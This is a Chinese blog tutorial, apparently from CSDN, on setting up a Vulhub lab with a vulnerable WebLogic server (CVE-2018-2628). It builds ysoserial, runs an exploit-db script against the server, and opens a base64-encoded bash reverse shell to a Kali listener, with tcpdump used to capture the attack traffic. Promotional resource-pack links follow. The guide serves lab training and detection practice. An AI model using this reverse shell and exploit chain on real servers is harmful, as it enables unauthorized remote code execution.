使用Vulhub快速搭建攻防环境靶场+tcpdump实行流量监测

前期准备

vmware workstation15

Ubuntu 18.04 192.168.50.157

kali linux  192.168.50.53

开始安装

vmware workstation15 安装方法如下

https://www.ainiseo.com/question/8170.html

Ubuntu 18.04  安装方法如下

https://zhuanlan.zhihu.com/p/38797088

docker 安装

apt-get install docker\*

安装git

apt-get install git

安装net-tools

apt-get install net-tools

安装成功后查看docker版本

启动docker服务

service docker start

修改docker国内镜像源、我们这里使用阿里云源

创建或修改 /etc/docker/daemon.json 文件

{  
"registry-mirrors": \["https://cr.console.aliyun.com"\]  
}
Docker中国区官方镜像 https://registry.docker-cn.com  
网易 http://hub-mirror.c.163.com ustc  
中国科技大学 https://docker.mirrors.ustc.edu.cn  
阿里云容器  服务 https://cr.console.aliyun.com/

下载Vulhub靶场

wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip  
unzip vulhub-master.zip  
cd vulhub-master  

此次我们使用weblogic反序列化漏洞、切换到/vulhub-master/weblogic/CVE-2018-2628

使用docker-compose 下载vulhub下的靶场环境

docker-compose up -d

使用docker ps 查看启动进程

如果多个进程同时启动/停止/删除可以用下列命令(其余命令属于扩展)

docker start $(docker ps -qa)   #启动所有镜像  
docker stop  $(docker ps -qa) #停止所有镜像  
docker rmi  $(docker ps -qa)  #删除所以镜像  
docker exec -it  id  /bin/bash #进入到一个docker shell下  
docker export -o test.tar 54dc157b2982    #镜像打包 test.tar为你需要打包的文件名 54dc157b2982 为你需要打包的进程ID  
cat test.tar | docker import - test\_123 # 导入镜像包到本地  
docker images #查看test\_123是否导入成功  
run -it -v /:/mnt --entrypoint /bin/bash ubuntu # 映射宿主机根目录到虚拟机/mnt下  
docker push zhang0908/fudan-consumer1:v1  #将本地镜像上传到Docker Hub(或阿里云Hub)  
docker pull hang0908/fudan-consumer1  #从Docker Hub(或阿里云Hub)、下载镜像到本地  

在宿主机尝试访问weblogic后台

http://192.168.50.157:7001/console/login/LoginForm.jsp

kali linux  安装方法

https://blog.csdn.net/qq\_41625341/article/details/106152051

ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 工具下载编译

git clone https://github.com/brianwrf/ysoserial.git  
cd ysoserial  
mvn clean package -DskipTests

kali linux 默认没有安装mvn 安装方法非常简单方法如下

https://blog.csdn.net/weixin\_44018338/article/details/98962529

漏洞利用

使用以下网址对Shell反弹编码转换、转换IP如下192.168.50.53:8888此地址进行转换

http://www.jackson-t.ca/runtime-exec-payloads.html

复制地址

bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguNTAuNTMvODg4OCAgMD4mMQ==}|{base64,-d}|{bash,-i}

切换到我们编译好的ysoserial目录下、执行下面代码来监听JRMP1099端口

下载https://www.exploit-db.com/exploits/44553exp脚本下载后重命名为exploit.py

然后通过运行exploit.py 脚本进行攻击获取服务器shell

运行exploit.py 向漏洞主机执行远程代码

python exploit.py  192.168.50.157 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.50.53 1099 JRMPClient

在Ubuntu下使用tcpdump -i ens33 -w weblogic.pcap 命令来检测攻击者使用的攻击脚本、执行的命令。

返回kali linux 下用nc 监听8888 端口:

nc -lvnp 8888

再次返回到Ubuntu系统下 按Ctrl+c 结束tcp抓包、对pcap数据包进行查看

可以看到对方使用主机类型包括执行命令

至此结束、没什么技术含量大神勿喷。当然也可以把ens33上行接口做成流量镜像口、然后通过威胁态势感知平台来检测来自各个地方的攻击。

网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套200G学习资源包免费分享!

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值